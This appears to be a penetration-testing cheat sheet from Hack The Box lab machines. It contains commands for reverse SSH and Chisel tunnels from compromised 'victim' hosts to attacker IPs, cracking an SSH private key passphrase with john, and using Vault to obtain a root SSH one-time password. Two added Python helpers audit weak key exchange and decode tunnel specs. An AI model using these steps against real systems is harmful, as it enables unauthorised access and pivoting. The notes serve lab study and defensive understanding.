$ ssh root@beep.htb
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
$ ssh -oKexAlgorithms=+diffie-hellman-group-exchange-sha1 root@beep.htb
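The error above shows the server offering only SHA-1 based key exchange methods, which current OpenSSH clients refuse by default. The check below is an added audit helper (not part of the original note) that parses that client error message and flags the deprecated methods, so the finding can be recorded and fixed on the server side by removing them from `KexAlgorithms` in `sshd_config` rather than re-enabling them on the client. The sample message is the one from the note; `WEAK_KEX` is my own list of the SHA-1 and group1 methods OpenSSH has disabled by default.

```python
import re

# KEX methods that rely on SHA-1 or on the 1024-bit "group1" modulus.
# Modern OpenSSH clients disable all three by default, which is why the
# client in the note refuses to negotiate until one is re-enabled.
WEAK_KEX = {
    "diffie-hellman-group1-sha1",
    "diffie-hellman-group14-sha1",
    "diffie-hellman-group-exchange-sha1",
}

# Matches the "Their offer:" part of the OpenSSH client error message.
OFFER_RE = re.compile(
    r"no matching key exchange method found\. Their offer: (?P<offer>[\w@.,-]+)"
)


def parse_kex_offer(message: str) -> list[str]:
    """Extract the server's offered KEX list from the OpenSSH error message."""
    m = OFFER_RE.search(message)
    if not m:
        raise ValueError("not an OpenSSH 'no matching key exchange' message")
    return m.group("offer").split(",")


def audit_kex(offer: list[str]) -> dict:
    """Split an offer into weak and acceptable methods and say if only weak ones remain."""
    weak = [k for k in offer if k in WEAK_KEX]
    return {
        "weak": weak,
        "acceptable": [k for k in offer if k not in WEAK_KEX],
        "sha1_only": bool(offer) and len(weak) == len(offer),
    }


# Error message copied from the note above (host beep.htb / 10.10.10.7).
SAMPLE = (
    "Unable to negotiate with 10.10.10.7 port 22: no matching key exchange "
    "method found. Their offer: diffie-hellman-group-exchange-sha1,"
    "diffie-hellman-group14-sha1,diffie-hellman-group1-sha1"
)

if __name__ == "__main__":
    report = audit_kex(parse_kex_offer(SAMPLE))
    print(report)
```

A server that reports `sha1_only` can only be reached by re-enabling a deprecated method client-side; the durable fix is on the server, where `KexAlgorithms` should list only SHA-2 or curve25519 based methods.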
SSH Tunneling
// Remote tunnel from victim, enum victim port 5432 (postgresql)
ssh -N -f -R 5432:localhost:5432 p3@10.10.14.10
// Local tunnel from attacker, enum victim port 8002
ssh -N -f -L 8002:localhost:8002 hflaccus@carpediem.htb
ssh -N -f -L 3306:localhost:3306 charlie@extension.htb -i id_rsa
## Using Chisel to enumerate local webservices on remote host
// Chisel Server (attacker host)
$ ./chisel_1.7.7_linux_amd64 server -p 4444 -reverse
// Chisel Client (victim host)
$ ./chisel_1.7.7_linux_amd64 client 10.10.14.5:4444 R:8080:127.0.0.1:8080
## Using Chisel to set up a tunnel from a compromised docker container to proxy
## traffic toward the docker host (172.17.0.1:3000).
// Chisel Server (attacker host)
$ ./chisel_1.7.7_linux_amd64 server -p 3333 -reverse
// Chisel Client (victim docker)
$ ./chisel_1.7.7_linux_amd64 client 10.10.15.17:3333 R:127.0.0.1:3000:172.17.0.1:3000
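The `-L`/`-R` and `R:` specs in the SSH and Chisel sections above are easy to misread: which machine ends up with a listening socket, on which address, and where the traffic exits. The helper below is an added example (my own code, not from the note or from the Chisel project) that decodes both syntaxes into those facts, using the exact specs from the commands above as sample input. It assumes the documented defaults: OpenSSH binds forwards to loopback unless `GatewayPorts`/`-g` is set, and Chisel binds to `0.0.0.0` when no local interface is given; a three-part Chisel spec is read as `local_port:remote_host:remote_port`, as in the note.

```python
def describe_ssh_forward(flag: str, spec: str) -> dict:
    """Decode an OpenSSH -L or -R spec: [bind_address:]port:host:hostport.

    -L: the ssh client listens on bind_address:port and sends each connection
        to host:hostport as reached from the ssh server.
    -R: the ssh server listens on bind_address:port and sends each connection
        back to host:hostport as reached from the ssh client.
    """
    parts = spec.split(":")
    if len(parts) == 3:
        bind, port, host, hostport = None, *parts
    elif len(parts) == 4:
        bind, port, host, hostport = parts
    else:
        raise ValueError(f"malformed ssh forward spec: {spec!r}")
    if flag == "-L":
        listen_side, exit_side = "ssh client", "ssh server"
    elif flag == "-R":
        listen_side, exit_side = "ssh server", "ssh client"
    else:
        raise ValueError("flag must be -L or -R")
    return {
        "listens_on": listen_side,
        # Both ssh (-L) and sshd (-R) bind to loopback unless GatewayPorts/-g.
        "bind": bind or "127.0.0.1",
        "listen_port": int(port),
        "connects_from": exit_side,
        "target": f"{host}:{hostport}",
    }


def describe_chisel_remote(spec: str) -> dict:
    """Decode a chisel client remote: [R:][local_interface:]local_port:remote_host:remote_port.

    Without R: the chisel client listens and the server makes the outbound
    connection. With R: (requires `server --reverse`) the chisel server listens
    and the client makes the outbound connection, which is how the notes above
    expose a service only reachable from the compromised host.
    """
    reverse = spec.startswith("R:")
    body = spec[2:] if reverse else spec
    parts = body.split(":")
    if len(parts) == 3:
        # Assumption: three-part form is port:host:port, bound to chisel's
        # default interface 0.0.0.0.
        iface, lport, rhost, rport = "0.0.0.0", *parts
    elif len(parts) == 4:
        iface, lport, rhost, rport = parts
    else:
        raise ValueError(f"malformed chisel remote: {spec!r}")
    return {
        "listens_on": "chisel server" if reverse else "chisel client",
        "bind": iface,
        "listen_port": int(lport),
        "connects_from": "chisel client" if reverse else "chisel server",
        "target": f"{rhost}:{rport}",
    }


if __name__ == "__main__":
    # Specs taken from the commands in the notes above.
    for flag, spec in [("-R", "5432:localhost:5432"),
                       ("-L", "8002:localhost:8002"),
                       ("-L", "3306:localhost:3306")]:
        print(f"ssh {flag} {spec}:", describe_ssh_forward(flag, spec))
    for spec in ["R:8080:127.0.0.1:8080", "R:127.0.0.1:3000:172.17.0.1:3000"]:
        print(f"chisel {spec}:", describe_chisel_remote(spec))
```

The two Chisel examples differ only in the bind address: `R:8080:...` leaves the listener on every interface of the Chisel server, while `R:127.0.0.1:3000:...` keeps it on loopback, which is the form to prefer whenever the service behind it carries credentials.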
Brute Force id_rsa
// Convert id_rsa (.pem) to hash with ssh2john, and crack with john.
$ ssh2john.py id_rsa > id_rsa.hash
$ john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt
Vault SSH OTP
Vault is used to provide one-time passwords (OTP) for SSH logins. To request an OTP you need to know the role, for example ssh/creds/otp_key_role; in this case the role was found in secrets.sh.
$ vault write ssh/creds/root_otp ip=10.10.10.110
Key                Value
---                -----
lease_id           ssh/creds/root_otp/bdbe45d6-24b0-6a02-8534-d37bbb3f54c5
lease_duration     768h
lease_renewable    false
ip                 10.10.10.110
key                1762e6a1-f975-61f8-814e-f7d65a2a1f51
key_type           otp
port               22
username           root